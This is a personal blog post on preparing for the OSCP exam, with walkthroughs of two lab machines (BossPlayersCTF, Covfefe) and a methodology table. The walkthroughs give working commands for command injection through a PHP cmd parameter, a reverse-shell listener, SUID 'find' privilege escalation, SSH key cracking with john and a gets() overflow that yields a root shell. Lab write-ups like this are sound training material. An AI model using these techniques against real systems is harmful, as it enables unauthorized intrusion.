---
layout: post
title: The Full Methodology for OSCP Passing.
excerpt: Lately, I've been thinking a lot about some job interviews I had recently, especially one at a really good company near me. The interviews were interesting and kind of tough, and they got me thinking about my work...
tags:
- Pentest
- OSCP

---

Lately, I've been thinking a lot about some job interviews I had recently, especially one at a really good organization near to my aria. The interviews were interesting and kind of tough, and they got me thinking about my work and where I'm headed.

The first interview was on Zoom and was all about technical stuff. They asked me about Wireshark, which is a tool for analyzing network traffic, and about different protocols like TCP, LDAP, and SMB2. They also asked about things like Linux processes and sockets, which are like communication channels between computers. It was a good chat, and I felt like I could talk to them easily. They even explained what comes next in their hiring process.

Then, about a week later, I had another interview, this time with the big boss of the IT department. The questions from the boss showed that he really have knowlage on the IT aria and cyber security field. One thing he asked about was a Python program I made to send information from one computer system to another—it was a bit of a challenge, but I managed to explain it well. Even though the interview went longer than expected, it felt like a positive conversation.

But then came the tough part. After all that, the recruiter called and said they weren't sure about moving forward because they saw a "gap in my skills." Hearing that hurt. I've been working in this field for 12 years, and my bosses and colleagues think I'm good at what I do. Just last month, I got three thank-you notes from coworkers because I helped fix some long-standing problems at work.

After mulling it over, I realized something important: I still hadn't finished the ultimate certification, the "OSCP", which is a big deal in my field. Maybe that's what's holding me back. Maybe finishing that certification could prove, first of all for myself that I'm as good as I think I am.

As I thought more about it, I realized I need to work on having a clear plan and method for tackling challenges. If I can improve how I approach problems and show that I'm always learning, I believe I can prove myself and pass that certification.

So, even though getting that feedback was tough, it's motivated me to keep growing and improving. I'm determined to show that I'm ready for whatever comes my way.

And here I am going to write in this post about this methodology, in fact in order to pass the exam you need to hack 6 machines, 3 are part of the windows domain and another 3 individuals, one of which is a buffer overflow, my problem is the methodology, I know the commands, the actions that need to be performed, and I know Looking for good information and learning while doing it, my problem is the connection between all the pieces of the puzzle, most of the machines where I broke down and went looking for clues are machines that I just didn't look at the full picture and therefore I dug into what there is no need to dig into.

Since the way to prepare for the test is by hacking as many machines as possible, I will do it on the proving ground, and speaking of that there are 5 types of machines, 5 point, 8 point, 10 point, 20 point and 25 point machines.

For each type of orientation I will present an orderly methodology to order these issues. Note, in fact, the more difficult the machine is, the broader the methodology becomes. In order to build these patterns I had to hack everything in proving ground and the post before you have seen here is the result of that.

So hold on tight, we're starting. This is 18 February, so we have time till 18 May to finish this all and passing the exam.

Let's track it done, this post agenda are:
- [5 points box methodology](#5-points-box-methodology)
- [8 points box methodology](#8-points-box-methodology)
- [10 points box methodology](#10-points-box-methodology)
- [20 points box methodology](#20-points-box-methodology)
- [25 points box methodology](#25-points-box-methodology)

## 5 points box methodology

For boxs that have only 5 points, I have done more then 40 boxs, so first we need to develop the table methodology for that case of easy machines. Let's look on 5 machines that are easy for hack for just 5 points.

### BossPlayersCTF

1. Enumeration: run scanner to find open ports, like rustscan and found port 20 and 80 are opened, run nmap to find which service have some vulnerability, but found nothing so go against the web.

2. Web fuzzing: run tool for fuzzing the web like feroxbuster, gobuster, dirsearch, in my case I have used my own tool called webenum with feroxbuster but found nothing interesting, run cewl against the web found weird string, so go to the page and view source code found string in base64, decompress that string give me the following output:
```
└─$ echo "WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK" | base64 -d | base64 -d|base64 -d
workinginprogress.php
```
Since we found another web page, go  against it revealed the developer made some wey to run command base on that php page, adding `?cmd=id` give the output:
```
└─$ curl "http://192.168.xxx.20/workinginprogress.php?cmd=id" | grep uid
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   325  100   325    0     0   2496      0 --:--:-- --:--:-- --:--:--  2500
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

3. Shell Grabbing: since we know that with cmd variable against that php page we can run any command, we can use commix which is the easy way to get shell from provided variable point that allow to execute command, and right away we have a shell:
```
└─$ commix --url "http://192.168.225.20/workinginprogress.php?cmd="
...
commix(os_shell) > id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
commix(os_shell) >
```
Now run nc for get more comfortable shell, then run python for get the spawn of it.
```
└─$ nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.xxx.193] from (UNKNOWN) [192.168.xxx.20] 58134
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@bossplayers:/var/www/html$
```

4. System enumeration: now run echo against $PATH to find all binaries file we have access and also if the machine contain some binaries that set with SUID that we can advantage, we find the `find` binary file with SUID set.
```
www-data@bossplayers:/var/www/html$ ls -la $(echo $PATH|tr ":" " ")|grep rws
ls -la $(echo $PATH|tr ":" " ")|grep rws
...
-rwsr-sr-x  1 root root     315904 Feb 16  2019 find
...
www-data@bossplayers:/var/www/html$
```

5. Privilege Escalation: going to `https://gtfobins.github.io/` to understand how to get root shell from the binary file we found, then found the way to execute `find` with the following to get root shell with `sh`.
```
www-data@bossplayers:/var/www/html$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
#
```

### Covfefe

1. Enumeration: run full port scan with rustscan and found that 22,80,31337 are open so run nmap against them and found that port 31337 is also web based, since ssh is on version 7.2, it better idea to run web enumeration against port 80 and 31337.

2. Web Fuzzing: run webenum with feroxbuster against each (80,31337) found more interesting directory on port 31337 which are .ssh, on that folder I was able to view private and public key and also the authorized keys in uses, so run wget

3. Trying Grabbing Shell: running the following ssh command with the private key.
└─$ chmod 600 id_rsa
└─$ ssh -i id_rsa simon@192.168.xxx.10 -p 22
Enter passphrase for key 'id_rsa':
since it's ask for password we need to crack that id_rsa.

4. Hash Cracking: convert id_rsa to john:
└─$ ssh2john ./id_rsa > id_rsa.hash
then run john:
└─$ john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
if it found the password, we also can view it by using:
└─$ john id_rsa.hash --show
./id_rsa:starwars

5. Shell Grabbing: running the ssh command again with the password we found for id_rsa we have shell on the target:
└─$ ssh -i id_rsa simon@192.168.189.10 -p 22
Enter passphrase for key 'id_rsa':
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686
....
Last login: Mon May 22 19:35:10 2023 from 192.168.45.212
simon@covfefe:~$

6. System Enumeration: running `linpeas` found that we have access to /root directory but we can't read the flag (we are not the root), but we can see read_message.c and also found read_message binary with SUID, so since we can read the source code it may mean that we can run for buffer overflow against it to gain root.

7. Buffer Overflow: We need first to read the code to understand what dose it do, we can transfer it to our local machine and use gdb, in our case by looking the code it's self we can un derstand how to break it:
```
int main(int argc, char *argv[]) {
char program[] = "/usr/local/sbin/message";
char buf[20];
char authorized[] = "Simon";
```

In that lines there is a `buf` variable which is in the size of 20 chars, the authorized is Simon and later it used to check the value from the user input if it match.
```
printf("What is your name?\n");
gets(buf);
since gets have no bouderies we can exploit it
if (!strncmp(authorized, buf, 5)) {
printf("Hello %s! Here is your message:\n\n", buf);
// This is safe as the user can't mess with the binary location:
execve(program, NULL, NULL);
```
The `execve` is used to run binary file, which in our case should be `/usr/local/sbin/message`, since the matching on that code used for the five first chars we can overflow the `buf` to
contain more then 20 chars and after that overwrite the program value with another binary value, in my case `/bin/sh`.

8. Privalge Escalation: running the program with the values more then 20 chars and insert /bin/sh to gain shell as root:
simon@covfefe:~$ read_message
What is your name?
Simonnnnnnnnnnnnnnnn/bin/sh
Hello Simonnnnnnnnnnnnnnnn/bin/sh! Here is your message:
# id
uid=1000(simon) gid=1000(simon) euid=0(root) groups=1000(simon),24(cdrom),25(floppy
),29(audio),30(dip),44(video),46(plugdev),108(netdev)

### Fowsniff

### Geisha

### JISCTF

### Final table methodology

After finish them all, I came up with the following table.


| Stage | Enumeration | Exploitation | Initiation | Escalation |
|-------|-------------|--------------|------------|------------|
| Information Gathering	| Port scanning using tools like nmap,rustscan, naabu, autorecon. |	Web application scanning using automated tools like Burp Suite or OWASP ZAP to discover web applications and their technologies. | Researching known vulnerabilities associated with discovered services and applications.| Determining the potential impact and severity of identified vulnerabilities.|
| App/Prog/Code Assessment | Conducting a detailed review of web application source code for security flaws. | Manual testing of application endpoints for common vulnerabilities such as SQL injection, XSS, and CSRF. | Analyzing third-party components and libraries for known vulnerabilities using tools like Retire.js or Dependency-Check. | Assessing the configuration of servers and applications for security best practices and misconfigurations. |
| Action Taking | Exploiting discovered vulnerabilities using proof-of-concept (POC) exploit code or Metasploit modules. | Gaining initial access to the target system through successful exploitation. |	Establishing a foothold on the compromised system by creating backdoors or user accounts. | 	Escalating privileges to gain higher levels of access or control over the target environment. |
| Results Examination	| Documenting all findings including vulnerabilities, exploited systems, and compromised data.	| Analyzing logs and artifacts to reconstruct the attack timeline and identify any additional security risks. | Assessing the effectiveness of security controls and incident response procedures during the penetration test. | Providing recommendations for remediation and improving overall security posture based on the findings. |
